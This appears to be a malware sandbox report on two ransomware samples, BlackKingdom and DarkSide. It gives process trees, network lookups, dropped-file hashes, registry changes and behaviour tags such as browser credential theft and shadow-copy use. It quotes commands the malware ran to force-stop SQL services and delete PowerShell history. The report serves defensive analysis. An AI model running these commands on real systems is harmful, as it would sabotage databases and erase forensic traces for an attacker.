PID 608 wrote to memory of 1200	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 608 wrote to memory of 1200	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 1200 wrote to memory of 2296	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1200 wrote to memory of 2296	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	136.32.126.40.in-addr.arpa	udp
US	8.8.8.8:53	228.249.119.40.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	13.107.21.237:443	g.bing.com	tcp
US	8.8.8.8:53	mega.io	udp
LU	66.203.124.37:80	mega.io	tcp
LU	66.203.124.37:443	mega.io	tcp
US	8.8.8.8:53	237.21.107.13.in-addr.arpa	udp
US	8.8.8.8:53	g.api.mega.co.nz	udp
LU	66.203.125.16:443	g.api.mega.co.nz	tcp
LU	66.203.125.16:443	g.api.mega.co.nz	tcp
US	8.8.8.8:53	37.124.203.66.in-addr.arpa	udp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp
US	8.8.8.8:53	16.125.203.66.in-addr.arpa	udp
US	8.8.8.8:53	217.106.137.52.in-addr.arpa	udp
US	8.8.8.8:53	50.23.12.20.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	37.58.20.217.in-addr.arpa	udp
US	8.8.8.8:53	55.36.223.20.in-addr.arpa	udp
US	8.8.8.8:53	11.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI32482\ucrtbase.dll

MD5	298e85be72551d0cdd9ed650587cfdc6
SHA1	5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256	eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512	3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI32482\python37.dll

MD5	c4709f84e6cf6e082b80c80b87abe551
SHA1	c0c55b229722f7f2010d34e26857df640182f796
SHA256	ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3
SHA512	e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4

C:\Users\Admin\AppData\Local\Temp\_MEI32482\VCRUNTIME140.dll

MD5	89a24c66e7a522f1e0016b1d0b4316dc
SHA1	5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42
SHA256	3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6
SHA512	e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

C:\Users\Admin\AppData\Local\Temp\_MEI32482\base_library.zip

MD5	a70f10b994f5b2e03777b4d355eef788
SHA1	141be3cef837cf6120f71c714259d9799586b483
SHA256	766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c
SHA512	5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_ctypes.pyd

MD5	5e869eebb6169ce66225eb6725d5be4a
SHA1	747887da0d7ab152e1d54608c430e78192d5a788
SHA256	430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173
SHA512	feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_socket.pyd

MD5	8ea18d0eeae9044c278d2ea7a1dbae36
SHA1	de210842da8cb1cb14318789575d65117d14e728
SHA256	9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2
SHA512	d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

C:\Users\Admin\AppData\Local\Temp\_MEI32482\select.pyd

MD5	fb4a0d7abaeaa76676846ad0f08fefa5
SHA1	755fd998215511506edd2c5c52807b46ca9393b2
SHA256	65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429
SHA512	f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f

C:\Users\Admin\AppData\Local\Temp\_MEI32482\pywintypes37.dll

MD5	77b6875977e77c4619bbb471d5eaf790
SHA1	f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade
SHA256	780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6
SHA512	783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_ssl.pyd

MD5	5a393bb4f3ae499541356e57a766eb6a
SHA1	908f68f4ea1a754fd31edb662332cf0df238cf9a
SHA256	b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047
SHA512	958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

C:\Users\Admin\AppData\Local\Temp\_MEI32482\libssl-1_1.dll

MD5	bc778f33480148efa5d62b2ec85aaa7d
SHA1	b1ec87cbd8bc4398c6ebb26549961c8aab53d855
SHA256	9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843
SHA512	80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173

C:\Users\Admin\AppData\Local\Temp\_MEI32482\libcrypto-1_1.dll

MD5	cc4cbf715966cdcad95a1e6c95592b3d
SHA1	d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256	594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA512	3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_hashlib.pyd

MD5	b32cb9615a9bada55e8f20dcea2fbf48
SHA1	a9c6e2d44b07b31c898a6d83b7093bf90915062d
SHA256	ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5
SHA512	5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_tkinter.pyd

MD5	09f66528018ffef916899845d6632307
SHA1	cf9ddad46180ef05a306dcb05fdb6f24912a69ce
SHA256	34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9
SHA512	ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tcl86t.dll

MD5	c0b23815701dbae2a359cb8adb9ae730
SHA1	5be6736b645ed12e97b9462b77e5a43482673d90
SHA256	f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768
SHA512	ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tcl\encoding\cp1252.enc

MD5	5900f51fd8b5ff75e65594eb7dd50533
SHA1	2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256	14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512	ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tk86t.dll

MD5	fdc8a5d96f9576bd70aa1cadc2f21748
SHA1	bae145525a18ce7e5bc69c5f43c6044de7b6e004
SHA256	1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5
SHA512	816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_bz2.pyd

MD5	cf77513525fc652bad6c7f85e192e94b
SHA1	23ec3bb9cdc356500ec192cac16906864d5e9a81
SHA256	8bce02e8d44003c5301608b1722f7e26aada2a03d731fa92a48c124db40e2e41
SHA512	dbc1ba8794ce2d027145c78b7e1fc842ffbabb090abf9c29044657bdecd44396014b4f7c2b896de18aad6cfa113a4841a9ca567e501a6247832b205fe39584a9

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_queue.pyd

MD5	c0a70188685e44e73576e3cd63fc1f68
SHA1	36f88ca5c1dda929b932d656368515e851aeb175
SHA256	e499824d58570c3130ba8ef1ac2d503e71f916c634b2708cc22e95c223f83d0a
SHA512	b9168bf1b98da4a9dfd7b1b040e1214fd69e8dfc2019774890291703ab48075c791cc27af5d735220bd25c47643f098820563dc537748471765aff164b00a4aa

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_lzma.pyd

MD5	5fbb728a3b3abbdd830033586183a206
SHA1	066fde2fa80485c4f22e0552a4d433584d672a54
SHA256	f9bc6036d9e4d57d08848418367743fb608434c04434ab07da9dabe4725f9a9b
SHA512	31e7c9fe9d8680378f8e3ea4473461ba830df2d80a3e24e5d02a106128d048430e5d5558c0b99ec51c3d1892c76e4baa14d63d1ec1fc6b1728858aa2a255b2fb

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_cpyHook.cp37-win_amd64.pyd

MD5	3271deb52590ba75eadbd732e859ea51
SHA1	a001ed3664f9fb87a6b52411438157f4619f50fd
SHA256	dc80b2f6122ff5f6b8bb37068f602809e9d4e54eaed70b6ae5b22901c83b3993
SHA512	472d9dc42cceb0c569b8f40c3a9d5844dd131bad02e206f7f4fbdc48c6c109f770bd3a69af6d37482d2cea1a23bad58b1c1642caf905df056668127dc1c2adf8

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_ecb.cp37-win_amd64.pyd

MD5	ea90e3f80b3f3d089e20514e52cae4bb
SHA1	2bd4a5e1b0871ef7ca753b635101216422260eee
SHA256	256f905da0b889b74dcc0ed69a090f26b92e82936e1b149ed1c6d413b45eff96
SHA512	8a8715842b1773386aa75a4eb7136cb8c43da3330e54eddf952469e165c59fe8ce3ed439db6b89e24d1640cec3c64ca2bb3d673727d6a90e9cbd161602d7692c

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_ofb.cp37-win_amd64.pyd

MD5	22d65fdceebad51d277a2d8db999b237
SHA1	f65ed91b8bab5c2766f4aeaa86580de0017770ad
SHA256	3a4a5aaaa9a80180601376412180b024dbd43c1a3c313dc408dcdd5ee208cd6a
SHA512	d574e7ba77d4bcea014742678608ce46b51b585a6cc8b6e2a2c064b426042c769083f5a74cebe00800283e6efc8f7b079ef0720c2a7bf51098b5f51978419dc9

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Util\_strxor.cp37-win_amd64.pyd

MD5	7d2ed7ed7b5f765f13123a905abdd190
SHA1	6c99d801d39c13f86352762d3c150f0c4ff2918b
SHA256	0dcbf6c5d564b77d40cc71096769ab89092b946dd8ebde2a0effb0c28b36ef3a
SHA512	9d5f307ae558ba62abc2b44b8dd3205a7a7c7524253662ba6f427288695aa41e02ac28785ab77b95a0961bff8b5860fd5b20b54438b280bf9f6cb2523dcedac6

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_SHA1.cp37-win_amd64.pyd

MD5	609daa8ccbefeda1291d663235c257eb
SHA1	3a7232f1f6c6b1c03963316c45b7ae335fd9ede6
SHA256	28cca9038d7f709a8cc251cc664195c68f65d61832547459fb8b3021044fe6da
SHA512	028a198e5c8b2f2f7bf8df716a06b5ffae0a875a9ac4d42c1bc64e4232e1d0700f79a01485a87c8fa7515e7c458912ef89487f4aea77fd769bd32e02ce3b1c64

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_SHA256.cp37-win_amd64.pyd

MD5	fd2bab04dcf785080fd7e6aa1abdb566
SHA1	9eece186b95a4a6ffa8fadca283ebd2e1f60a340
SHA256	a660650ba2a0914d510d931458bf93a2e2479cf5922bd830f55ff74deebb19c9
SHA512	5ba2a7e097506c18c5ac74c0adac276b137b04185286fc7f2151dc7e7628c044a99d062b123c56dcf2d409dea1b9a5624a08899f5b7735a233f465317e8cfac5

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_MD5.cp37-win_amd64.pyd

MD5	9172a2fc5c66fff01f12676d16d8e882
SHA1	ee71eafd922f0ee24f1559c63dd8c82b16dbba00
SHA256	1143956ef572524ca0a4db6e55b918d7e3e137fa87d15df31ae4f8a4d5c6334b
SHA512	8a70a90edbac647d04444e5c926d7619d200632192e978fb56f9597583d3cd4ed8dcb5a0db89f0d3f89a41157388d51a3ab3eca7bc19d37da6917ca954ee0741

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_Salsa20.cp37-win_amd64.pyd

MD5	2b6eac8d1d5cd08279f4c711f84e3953
SHA1	c1b44d08dcf6fe7f50a1707d91f606b70538ce62
SHA256	a05ffcf7b30d87021f67dc94324f4e7e0481809b07f59cbc77b6798aeb319e7b
SHA512	827215a6894c20e9dde798a660ba49f5810d48d50f75cbbe88607254dbd5bad9518c612f1a06fdd932e3836e928ef9f04df7ce4800614e09ca74fffc0070b86d

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_BLAKE2s.cp37-win_amd64.pyd

MD5	f79a4c8843675e13fc0d4f057faec76a
SHA1	80f8d466d2a42a3b278db0f6edb7e60c2f5afa26
SHA256	e4f57da1c2ae72d2ab4980a2ffa370ac0cf1f3f8c76273dcea3c28fd5c858c1e
SHA512	7955edd12c426599c5103fc71d4fa051092584e5bf6755beee5bbb76977927093ec6b73eaec0276de6e3e28e4f3e1ca0507d1b4a85eeba14f2e5b6032401715d

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_ctr.cp37-win_amd64.pyd

MD5	d02012848d57be3b3967d379ea42426e
SHA1	69610f7f1f35830639cdcf74f99a20be5bb011c7
SHA256	cc1782f000f855b66ff94ddbb34dae3aa520c3fbb98b972c5561f2745791849d
SHA512	51f2dbc9f74b9190fa1f395cac5e8e1b60ac3181da169477e7510411700d42bdcf426285cce8a09983eaa84597621c892d5dc360c56231031e2fc702cddd1be1

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_cfb.cp37-win_amd64.pyd

MD5	00afcb334aa9cbc635ffb7864d487bca
SHA1	9b0c29dc4c01984ef63d2b868b7d27637aeabde2
SHA256	69e5945cde019e9dcdc23404e81fcc7dd2313eebf259daa3a5af537eaf418267
SHA512	ef1b73b5906713f9b90afc41c60a29d45a1630a6ab1c22be1cc7aa72dc5db7b7bc90dfce1eefda9167a98e911952f7232c5c0f1c4e043428d292cf64fbae284b

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_cbc.cp37-win_amd64.pyd

MD5	b768eda0fa972c9cd34cebc1e7c4b54e
SHA1	95967222a6902226e9bc94bc1503c1638fbcc7cc
SHA256	4e872e1aa9229a3e95a970af1b6a71c17c5ab84e53a57012c5c7c4412fafeb3f
SHA512	fcf4de7f5be68bb029cd5f6a6413ce3fc1db0ea3d58152b766f86ae1c81653ac9c1b303b8622bb2a34b254f1b9f33e8422b42642992936512d80f435e5229690

C:\Users\Admin\AppData\Local\Temp\_MEI32482\unicodedata.pyd

MD5	4d3d8e16e98558ff9dac8fc7061e2759
SHA1	c918ab67b580f955b6361f9900930da38cec7c91
SHA256	016d962782beae0ea8417a17e67956b27610f4565cff71dd35a6e52ab187c095
SHA512	0dfabfad969da806bc9c6c664cdf31647d89951832ff7e4e5eeed81f1de9263ed71bddeff76ebb8e47d6248ad4f832cb8ad456f11e401c3481674bd60283991a

C:\Users\Admin\AppData\Local\Temp\_MEI32482\certifi\cacert.pem

MD5	1ba3b44f73a6b25711063ea5232f4883
SHA1	1b1a84804f896b7085924f8bf0431721f3b5bdbe
SHA256	bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197
SHA512	0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tcl\init.tcl

MD5	b900811a252be90c693e5e7ae365869d
SHA1	345752c46f7e8e67dadef7f6fd514bed4b708fc5
SHA256	bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a
SHA512	36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce

memory/2296-1095-0x00007FFDB6143000-0x00007FFDB6145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3vqugbp.qkt.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2296-1105-0x00000200763C0000-0x00000200763E2000-memory.dmp

memory/2296-1106-0x0000020076A90000-0x0000020076AD4000-memory.dmp

memory/2296-1107-0x0000020076AE0000-0x0000020076B56000-memory.dmp

memory/2296-1108-0x00007FFDB6140000-0x00007FFDB6C01000-memory.dmp

memory/2296-1109-0x00007FFDB6140000-0x00007FFDB6C01000-memory.dmp

memory/2296-1112-0x00007FFDB6140000-0x00007FFDB6C01000-memory.dmp

C:\Recovery\decrypt_file.TxT

MD5	38477b5a8a76bb92db7b5391ee1273b9
SHA1	b404b9b440b54318a2c5c7e20d11de8d6fc187c6
SHA256	787075b5f35e7e5e265a2bc7e5e6f88a9cb578e65aeb922e95cec48b5b22924d
SHA512	51bef79af3656f6239d52600f379b7b59bd41ee485c654c2c9a8e34c1e00be251a5496b2aca6a49ac9fac9979b1b8c629c026ce3fde75864ff8058e755dbea66

Analysis: behavioral20

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

146s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (144) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\d3877f44.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\d3877f44.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\Desktop\WallpaperStyle = "10"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.d3877f44	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.d3877f44\ = "d3877f44"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\d3877f44\DefaultIcon	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\d3877f44	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\d3877f44\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\d3877f44.ico"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 34	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: 36	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 1264 wrote to memory of 2420	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2420	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	217.106.137.52.in-addr.arpa	udp
US	8.8.8.8:53	74.32.126.40.in-addr.arpa	udp
US	8.8.8.8:53	241.150.49.20.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	13.107.21.237:443	g.bing.com	tcp
US	8.8.8.8:53	237.21.107.13.in-addr.arpa	udp
US	8.8.8.8:53	43.58.199.20.in-addr.arpa	udp
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	71.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	13.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	17.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	28.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	33.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	49.0.127.10.in-addr.arpa	udp
